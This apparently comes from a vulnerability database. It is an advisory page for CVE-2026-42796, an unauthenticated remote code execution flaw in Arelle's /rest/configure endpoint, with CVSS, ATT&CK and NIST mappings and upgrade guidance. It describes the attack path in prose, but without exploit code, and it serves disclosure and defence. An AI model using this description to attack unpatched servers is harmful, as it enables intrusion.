CVE-2026-42796
Published: 04 May 2026
Summary
CVE-2026-42796 is a critical-severity Missing Authentication for Critical Function (CWE-306) vulnerability. Its CVSS base score is 9.8 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 43.9% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 AC-14 (Permitted Actions Without Identification or Authentication) and AC-3 (Access Enforcement).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)AI
Directly mitigates the vulnerability by prohibiting unauthenticated access to critical functions like the /rest/configure endpoint's plugins parameter that enables remote code execution.
Enforces security requirements on publicly accessible web endpoints such as /rest/configure to prevent unauthorized remote code execution via unauthenticated requests.
Enforces approved authorizations to block unauthenticated access to the plugin manager through the vulnerable REST endpoint.
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Unauthenticated RCE in public /rest/configure endpoint enables T1190 (Exploit Public-Facing Application). Attacker-supplied URL causes server-side download (T1105 Ingress Tool Transfer) followed by Python execution (T1059.006) with process privileges.
NVD Description
Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the /rest/configure REST endpoint that accepts a plugins query parameter and forwards it to the plugin manager without authentication or authorization. Attackers can supply a URL to a malicious…
more
Python file through the plugins parameter, causing the Arelle webserver to download and execute the attacker-controlled code within the Arelle process with its privileges.
Deeper analysisAI
CVE-2026-42796 is an unauthenticated remote code execution vulnerability affecting Arelle versions prior to 2.39.10. The issue resides in the /rest/configure REST endpoint, which accepts a plugins query parameter and passes it directly to the plugin manager without any authentication or authorization checks. By supplying a URL pointing to a malicious Python file via this parameter, an attacker can cause the Arelle webserver to download and execute the attacker-controlled code within the Arelle process, running with its existing privileges. The vulnerability is rated with a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and is associated with CWE-306 (Missing Authentication for Critical Function).
Any unauthenticated remote attacker with network access to the Arelle webserver can exploit this vulnerability by crafting an HTTP request to the /rest/configure endpoint with a malicious plugins parameter. Successful exploitation leads to arbitrary code execution on the server, potentially allowing full compromise of the Arelle process, including high confidentiality, integrity, and availability impacts as reflected in the CVSS vector.
Mitigation is available through upgrading to Arelle version 2.39.10 or later, as detailed in the project's release notes. The fixing pull request (#2320) on the Arelle GitHub repository addresses the lack of authentication by implementing proper checks in the plugin manager. Additional details on the vulnerability and exploitation are provided in the Vulncheck advisory.
Details
- CWE(s)